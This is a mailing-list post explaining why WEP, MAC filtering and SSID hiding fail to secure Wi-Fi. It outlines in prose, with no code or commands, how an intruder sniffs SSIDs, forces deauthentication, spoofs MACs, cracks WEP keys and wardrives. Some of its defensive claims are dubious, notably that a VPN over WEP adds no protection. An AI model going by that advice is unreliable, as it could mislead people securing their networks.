I've been worried all night about people thinking that WEP, a network setup, and changed SSID make a wireless network secure (yes I do have better things to do but that doesn't always matter). So here's synopsis of the inherent weaknesses of wireless. If you want a detailed exposition I'd recommend "Hacking Expose", 4th edition, McClure, Scambray, and Kurtz. If you know hacking, you know it is authoritative.
Wireless hacking relies on the fact that most necessary information for penetration is sent in clear text. It's just a matter of sniffing and analysis with an occasional nudge at the network to help it cough the proper information. It begins by obtaining the SSID. The SSID identifies the network, it's like a domain name. As a matter of convenience to users the SSID is generally broadcast by the AP. So obtaining it is just a matter of asking with probes or picking it off beacons sent by the access point. If this isn't the case and users actually have to manually enter the ssid, then all a hacker has to do is send a deauthentication frame to knock all users off and pick the packets when users log back in. How many times do you loose wireless connections and not think anything of it? MAC access control adds nothing to this. The MAC is unencrypted and therefore trivial to discover. Spoof a MAC and you are in. WEP encrypts the data portion of a packet but not the header or the IV (initialization vector) or ID portions of the packet. The IV is used to create the secret key used by WEP for data encryption. The key is based on the 24 bit IV field. This turns out to be a relatively easy scheme to crack. A team of researches spent $100 on equipment, several hours at coding and a weeks worth of time from start to finish to penetrate a medium sized wireless network. (http://dsonline.computer.org/0207/features/news_2.htm) The solution is to only use WEP which has been modified to mask the IV and which does a better job of randomization than the current WEP algorithm. Some vendors have done this but they of course cost more. VPN over WEP will not help. Again the problem is that only the data portion of the packet is in the tunnel. The IV is still in clear text since that runs on WEP. SSID and key in hand anyone will have the run of your network. Hiding in plain sight won't help in the end. An access point might have a range of only 300ft but a laptop equipped with a gps has a much wider range as do other antennas. A leisurely drive through the neighborhood will map a set of wireless networks. Then it's just a matter of grabbing a few million packets to get the key and SSID. If you want security do all of the ssid changes, stop the beacons, block the probes but don't stop there because that's really only to keep the non-nosey neighbors out. Ok that vent is done. drew ____ � The WDVL Discussion List from WDVL.COM � ____ To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] Send Your Posts To: [EMAIL PROTECTED] To set a personal password send an email to [EMAIL PROTECTED] with the words: "set WDVLTALK pw=yourpassword" in the body of the email. To change subscription settings to the wdvltalk digest version: http://wdvl.internet.com/WDVL/Forum/#sub ________________ http://www.wdvl.com _______________________ You are currently subscribed to wdvltalk as: [EMAIL PROTECTED] To unsubscribe send a blank email to [EMAIL PROTECTED] To unsubscribe via postal mail, please contact us at: Jupitermedia Corp. Attn: Discussion List Management 475 Park Avenue South New York, NY 10016 Please include the email address which you have been contacted with.
